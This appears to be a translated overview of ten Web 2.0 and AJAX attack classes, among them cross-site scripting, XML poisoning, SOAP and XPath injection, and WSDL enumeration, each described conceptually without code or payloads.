Analysis of all ten web attack methods (attack vector)

1. Cross-Site Scripting in AJAX

For example, the Yamanner worm exploits the cross-site scripting vulnerability of Yahoo Mail AJAX, And the Samy worm exploits the cross-site scripting vulnerability of MySpace.com.

2. XML poisoning)

Attackers can perform DOS attacks by copying nodes, or generate invalid XML to interrupt the server logic. Attackers can also manipulate external entities to open any file or TCP connection port. XML data definition poisoning can also lead to changes in the running process, helping attackers obtain confidential information.

3. run malicious AJAX code

AJAX code can be run without the user's knowledge. If the user logs on to a confidential website, the confidential website returns a session cookie, and the user does not exit the confidential website, attackers can access the attacker's website using AJAX code (through this session cookie ?) Attackers can access webpages on a confidential website to steal users' confidential information. (Note: The explanation here is a bit vague. Theoretically, the browser will not pass the session cookie of a website to another website, that is, the sentence "When the browser makes an AJAX call to any Web site it replays cookies for each request. ", not completely correct)

4. RSS/Atom Injection

Attackers can inject Javascript scripts into RSS feeds. If these scripts are not filtered out on the server side, they may cause problems on the browser side.

5. WSDL scan and enumeration

WSDL provides the technologies used by Web services, as well as exposed methods, call modes, and other information. If the Web service does not prohibit unnecessary methods, attackers can use the WSDL scan to find potential attack points.

6. Data Verification in client AJAX Encoding

If developers rely only on the client for verification and do not re-verify on the server, it will lead to SQL injection, LDAP injection, and so on.

7. Web Service Routing Problems

The Web Service Security protocol uses the WS-Routing service. If any transfer station is attacked, SOAP messages can be intercepted.

8. Parameter operations for SOAP messages

Similar to SQL injection, if the node data in the SOAP message is not verified.

9. XPATH injection of SOAP messages

Similar to SQL injection, if you do not verify the data and directly perform XPATH queries.

10. perform operations on the binary file of the RIA fat client

Because the Rich Internet Applications component is downloaded to a local browser, attackers can reverse engineer binary files, decompile the code, modify files, and skip authentication logic.